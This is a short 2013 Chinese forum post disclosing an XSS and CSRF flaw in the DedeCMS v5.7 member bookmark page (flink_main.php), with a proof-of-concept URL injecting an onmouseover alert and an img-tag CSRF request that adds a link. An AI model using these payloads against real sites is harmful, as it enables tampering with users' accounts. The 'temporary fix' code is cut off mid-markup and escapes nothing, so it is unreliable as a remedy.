DEDECMS v5.7(2013-06-07) xss+csrf 0day

2013-07-11 20:39:13 16 1388 1
不知有人发过没有?有则删之,无则留之。。。

书签管理存在xss+csrf


http://localhost/dedecms/member/flink_main.php


xss:http://localhost/dedecms/member/flink_main.php?dopost=addnew&title=test' onmouseover=alert(1);'&url=test' onmouseover=alert(1);'

CSRF:<img src="http://localhost/dedecms/member/flink_main.php?dopost=addnew&title=test&url=test">
临时修复方法:

function GetLinkList(&$dsql)
{
    global $cfg_ml;
    $dsql->SetQuery("SELECT * FROM `#@__member_flink` WHERE mid='".$cfg_ml->M_ID."' ORDER BY aid DESC");
    $dsql->Execute();
    $j=0;
    while($row = $dsql->GetArray())
    {
        $j++;
        $line = "
<div class='item flink'>
  <div class='itemHead' >
    <div class='fRight'>
      <span class='itemDigg'><a href='#' />";
        echo $line;
    }
    if($j==0)
    {
        echo "尚无任何链接";
    }
}

关于作者

评论16次

要评论?请先  登录  或  注册